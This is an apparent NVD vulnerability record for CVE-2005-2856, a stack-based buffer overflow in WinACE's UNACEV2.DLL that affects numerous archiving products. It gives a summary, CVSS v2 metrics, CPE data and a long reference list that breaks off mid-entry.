Vulnerabilites related to winace - winace
Vulnerability from fkie_nvd
Published
2005-09-08 10:03
Modified
2024-11-21 00:00
Severity ?
Summary
Stack-based buffer overflow in the WinACE UNACEV2.DLL third-party compression utility before 2.6.0.0, as used in multiple products including (1) ALZip 5.51 through 6.11, (2) Servant Salamander 2.0 and 2.5 Beta 1, (3) WinHKI 1.66 and 1.67, (4) ExtractNow 3.x, (5) Total Commander 6.53, (6) Anti-Trojan 5.5.421, (7) PowerArchiver before 9.61, (8) UltimateZip 2.7,1, 3.0.3, and 3.1b, (9) Where Is It (WhereIsIt) 3.73.501, (10) FilZip 3.04, (11) IZArc 3.5 beta3, (12) Eazel 1.0, (13) Rising Antivirus 18.27.21 and earlier, (14) AutoMate 6.1.0.0, (15) BitZipper 4.1 SR-1, (16) ZipTV, and other products, allows user-assisted attackers to execute arbitrary code via a long filename in an ACE archive.
References
cve@mitre.orghttp://marc.info/?l=bugtraq&m=112621008228458&w=2
cve@mitre.orghttp://secunia.com/advisories/16479Patch, Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19454Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19458Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19581Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19596
cve@mitre.orghttp://secunia.com/advisories/19612
cve@mitre.orghttp://secunia.com/advisories/19834Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19890Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19931
cve@mitre.orghttp://secunia.com/advisories/19938Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19939
cve@mitre.orghttp://secunia.com/advisories/19967Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19975Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/19977Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/20009Vendor Advisory
cve@mitre.orghttp://secunia.com/advisories/20270
cve@mitre.orghttp://secunia.com/secunia_research/2005-41/advisory/
cve@mitre.orghttp://secunia.com/secunia_research/2006-24/advisoryVendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-25/advisoryVendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-27/Vendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-28/advisoryVendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-29/advisory/Vendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-30/advisoryVendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-32/advisory/
cve@mitre.orghttp://secunia.com/secunia_research/2006-33/advisory/Vendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-36/advisoryVendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-38/advisoryVendor Advisory
cve@mitre.orghttp://secunia.com/secunia_research/2006-46/advisory/
cve@mitre.orghttp://secunia.com/secunia_research/2006-50/advisory/
cve@mitre.orghttp://securityreason.com/securityalert/49
cve@mitre.orghttp://securitytracker.com/id?1014863
cve@mitre.orghttp://securitytracker.com/id?1015852
cve@mitre.orghttp://securitytracker.com/id?1016011
cve@mitre.orghttp://securitytracker.com/id?1016012
cve@mitre.orghttp://securitytracker.com/id?1016065
cve@mitre.orghttp://securitytracker.com/id?1016066
cve@mitre.orghttp://securitytracker.com/id?1016088
cve@mitre.orghttp://securitytracker.com/id?1016114
cve@mitre.orghttp://securitytracker.com/id?1016115
cve@mitre.orghttp://securitytracker.com/id?1016177
cve@mitre.orghttp://securitytracker.com/id?1016257
cve@mitre.orghttp://securitytracker.com/id?1016512
cve@mitre.orghttp://www.osvdb.org/25129
cve@mitre.orghttp://www.securityfocus.com/archive/1/432357/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/432579/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/433258/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/433352/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/433693/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/434011/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/434234/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/434279/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/436639/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/archive/1/440303/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/bid/14759
cve@mitre.orghttp://www.securityfocus.com/bid/19884
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1565
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1577
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1611
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1681
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1694
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1725
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1775
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1797
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1835
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/1836
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/2047
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/2184
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/2824
cve@mitre.orghttp://www.vupen.com/english/advisories/2006/3495
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26116
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26142
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26168
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26272
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26302
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26315
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26385
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26447
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26479
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26480
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26736
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/26982
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/27763
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/28787
af854a3a-2127-422b-91ae-364da2661108http://marc.info/?l=bugtraq&m=112621008228458&w=2
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/16479Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19454Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19458Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19581Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19596
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19612
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19834Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19890Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19931
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19938Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19939
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19967Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19975Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/19977Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/20009Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/20270
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2005-41/advisory/
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-24/advisoryVendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-25/advisoryVendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-27/Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-28/advisoryVendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-29/advisory/Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-30/advisoryVendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-32/advisory/
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-33/advisory/Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-36/advisoryVendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-38/advisoryVendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-46/advisory/
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/secunia_research/2006-50/advisory/
af854a3a-2127-422b-91ae-364da2661108http://securityreason.com/securityalert/49
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1014863
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1015852
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016011
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016012
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016065
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016066
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016088
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016114
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016115
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016177
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016257
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1016512
af854a3a-2127-422b-91ae-364da2661108http://www.osvdb.org/25129
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/432357/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/432579/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/433258/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/433352/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/433693/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/434011/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/434234/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/434279/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/436639/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/440303/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/14759
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/19884
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1565
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1577
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1611
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1681
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1694
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1725
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1775
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1797
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1835
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/1836
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/2047
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/2184
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/2824
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2006/3495
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26116
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26142
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26168
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26272
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26302
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26315
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26385
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26447
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26479
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26480
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26736
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/26982
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/27763
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/28787
Impacted products
Vendor Product Version
winace winace 2.6.0.0



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:winace:winace:2.6.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "64D2B1B2-B49D-4F22-B4C6-CE0FAF0FDF35",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Stack-based buffer overflow in the WinACE UNACEV2.DLL third-party compression utility before 2.6.0.0, as used in multiple products including (1) ALZip 5.51 through 6.11, (2) Servant Salamander 2.0 and 2.5 Beta 1, (3) WinHKI 1.66 and 1.67, (4) ExtractNow 3.x, (5) Total Commander 6.53, (6) Anti-Trojan 5.5.421, (7) PowerArchiver before 9.61, (8) UltimateZip 2.7,1, 3.0.3, and 3.1b, (9) Where Is It (WhereIsIt) 3.73.501, (10) FilZip 3.04, (11) IZArc 3.5 beta3, (12) Eazel 1.0, (13) Rising Antivirus 18.27.21 and earlier, (14) AutoMate 6.1.0.0, (15) BitZipper 4.1 SR-1, (16) ZipTV, and other products, allows user-assisted attackers to execute arbitrary code via a long filename in an ACE archive."
    }
  ],
  "id": "CVE-2005-2856",
  "lastModified": "2024-11-21T00:00:34.690",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": true,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2005-09-08T10:03:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=112621008228458\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/16479"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19454"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19458"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19581"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19596"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19612"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19834"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19890"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19931"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19938"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/19939"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19967"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19975"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19977"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20009"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/20270"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/secunia_research/2005-41/advisory/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-24/advisory"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-25/advisory"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-27/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-28/advisory"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-29/advisory/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-30/advisory"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/secunia_research/2006-32/advisory/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-33/advisory/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-36/advisory"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-38/advisory"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/secunia_research/2006-46/advisory/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/secunia_research/2006-50/advisory/"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securityreason.com/securityalert/49"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1014863"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1015852"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016011"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016012"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016065"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016066"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016088"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016114"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016115"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016177"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016257"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1016512"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/25129"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/432357/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/432579/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/433258/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/433352/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/433693/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/434011/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/434234/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/434279/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/436639/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/440303/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/14759"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/19884"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1565"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1577"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1611"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1681"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1694"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1725"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1775"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1797"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1835"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/1836"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/2047"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/2184"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/2824"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.vupen.com/english/advisories/2006/3495"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26116"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26142"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26168"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26272"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26302"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26315"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26385"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26447"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26479"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26480"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26736"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26982"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27763"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28787"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=112621008228458\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/16479"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19454"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19458"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19581"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19596"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19612"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19834"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19890"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19931"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19938"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/19939"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19967"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19975"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/19977"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/20009"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/20270"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/secunia_research/2005-41/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-24/advisory"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-25/advisory"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-27/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-28/advisory"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-29/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-30/advisory"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/secunia_research/2006-32/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-33/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-36/advisory"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/secunia_research/2006-38/advisory"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/secunia_research/2006-46/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/secunia_research/2006-50/advisory/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securityreason.com/securityalert/49"
    },
    {
